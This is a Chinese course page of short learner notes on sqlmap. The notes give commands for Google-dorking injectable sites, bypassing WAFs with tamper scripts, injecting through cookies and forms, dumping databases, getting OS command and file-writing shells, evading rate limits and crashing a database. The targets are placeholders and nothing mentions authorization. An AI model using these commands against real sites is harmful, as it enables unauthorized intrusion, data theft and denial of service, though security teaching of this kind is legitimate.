845人加入学习
(1人评价)
SQLMAP基础
价格 免费
该课程属于 武官课程 请加入后再学习

绕过WAF防火墙

--tamper

利用sqlmap集成的编码脚本

--privilege

查看注入点权限

[展开全文]

Mysql Dos攻击

必须知道一个账号和密码 或者一个shell

攻击语句有很多种需要分析

 

[展开全文]

Google

-g inurl:php?id=

搜索注入点

[展开全文]
hl0rey · 2017-02-03 · Google 0

请求延迟

--delay 隔一段时间访问一个正常页面(秒)

--safe-freq 设置次数或者别的 该项很自由

[展开全文]
hl0rey · 2017-02-03 · 请求延时 0

伪静态注入

xxx.html  改为xxx*.html

加个*符号

 

[展开全文]

交互写shell及命令

--os-cmd 执行命令

--os-shell 得到shell(会写入文件)

 

[展开全文]

post登录框注入

用burpsuite抓一个包

-r 指定文件 -p 指定参数

 

--forms 搜索表单

--data "name=1241&pass=4434" 指定参数

[展开全文]

cookies注入

--cookie "" cookies注入“id=3”(完整的参数式子)

--level 数字 指定等级

别的一样

-C " , "  

 

[展开全文]
hl0rey · 2017-02-03 · Cookie注入 0

--dbs 获取数据库

-D 指定数据库

mysql数据库注入

记得指定需要猜解的数据库

-C 指定字段 多个字段用逗号分隔

 

[展开全文]

-u "" 指定url地址

--tables 猜表

--columns 猜字段

-T 指定表名

--dump 猜解内容

[展开全文]

 

[展开全文]

使用编码脚本绕过waf,加密payload

--privilege 看权限

[展开全文]

sqlmap -u http://xxx --sql-shell

获得一个shell,之后执行sql命令,使数据库报错或者停止,dos

[展开全文]

sqlmap -u http://xxx* --dbs

最后加个*

[展开全文]

绕过网站的请求保护机制(如限制请求次数、3次后验证请求等)

[展开全文]
苏苏 · 2016-01-14 · 请求延时 0

执行命令:sqlmap -u http://xxx -os-cmd=ipconfig 指定语言、目标站点目录

sqlmap -u http://xxx -os-cmd=shell

之后网站会生成两个临时文件:tmp,可上传shell

 

[展开全文]

burp截sql包后保存为txt

[展开全文]

授课教师

课程特色

视频(10)
下载资料(10)